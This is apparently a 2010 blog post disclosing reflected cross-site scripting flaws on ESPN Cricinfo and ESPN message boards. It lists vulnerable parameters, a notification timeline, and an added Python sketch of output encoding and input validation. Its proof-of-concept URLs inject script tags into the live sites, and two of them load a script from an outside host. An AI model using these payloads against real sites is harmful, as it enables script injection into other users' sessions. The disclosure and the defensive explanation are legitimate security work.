Sunday, September 12, 2010

ESPN Cricinfo Cross Site Scripting (XSS)

+++About ESPN Cricinfo+++
http://www.cricinfo.com/

+++Affected URL(s)+++
All URLs using vulnerable parameters

+++Vulnerable Parameters / Functions+++
genre
object
template
country
author
site_area
... and perhaps more!

+++PoC+++
http://www.cricinfo.com/talk/content/current/multimedia/feature.html?genre=21'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/australia/content/quote/index.html?object=2'"/><script>alert("XSS from object")</script>
http://www.cricinfo.com/australia/content/team/2.html?template=fixtures'"/><script>alert("XSS from template")</script>
http://www.cricinfo.com/australia/content/player/country.html?country=2'"/><script>alert("XSS from country")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?genre=366'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?author=29'"/><script/XSS/src=http://ha.ckers.org/xss.js>
http://www.cricinfo.com/magazine/content/current/story/magazine/alltime.html?site_area=5'"/><script/XSS/src=http://ha.ckers.org/xss.js>


ESPN Global 1st Notified: January 2010
2nd Notification: September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Note: More URLs / parameters may be vulnerable.

Best Regards.

ESPN Global Cross Site Scripting (XSS)


+++About ESPN Global+++
http://espn.go.com

+++Affected URL(s)+++
http://boards.espn.go.com

+++Vulnerable Parameter / Function+++
sport
id
nav

+++PoC+++
http://boards.espn.go.com/boards/mb/mb?sport=espn'><script>alert('XSS from sport')</script>&id=index'><script>alert('XSS from id')</script>

ESPN Global 1st Notified: January 2010
2nd Notification: September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)
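
The parameters in both advisories carry payloads of the same shape: a quote and tag terminator ('"/> or '>) followed by a script element. The sketch below is an added example, not code from ESPN or from the original post. It assumes the value is reflected inside a quoted HTML attribute (the page does not show the affected markup), uses a placeholder host, and shows the unsafe concatenation beside output encoding and allow-list validation. All function names are hypothetical.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: legitimate values are short ids or tokens, as in the PoC URLs
# before the payload starts (genre=21, template=fixtures, sport=espn).
ALLOWED = re.compile(r"[A-Za-z0-9_-]{1,32}")

# Constructed sample request; host is a placeholder, payload shape is the PoC's.
SAMPLE_URL = ("http://app.example.test/feature.html"
              "?genre=21'\"/><script>alert(\"XSS from genre\")</script>")


def query_value(url, name):
    """Return the first value of a query parameter, or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_unsafe(value):
    # Vulnerable pattern: raw input concatenated into a quoted attribute.
    # The leading '"/> in the payload closes the attribute and the tag.
    return '<input type="hidden" name="genre" value="' + value + '"/>'


def render_encoded(value):
    # Fix 1: encode for the HTML attribute context (quote=True also encodes
    # " and ', so the value cannot terminate the attribute).
    return ('<input type="hidden" name="genre" value="'
            + html.escape(value, quote=True) + '"/>')


def validate(value):
    # Fix 2: reject anything outside the allow-list before it is used at all.
    if not ALLOWED.fullmatch(value):
        raise ValueError("parameter value rejected")
    return value


if __name__ == "__main__":
    raw = query_value(SAMPLE_URL, "genre")
    print("unsafe :", render_unsafe(raw))
    print("encoded:", render_encoded(raw))
    try:
        validate(raw)
    except ValueError as exc:
        print("validate:", exc)
```

Encoding must match the output context: html.escape covers element content and quoted attributes, not values written into script blocks or URLs.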

Best Regards.
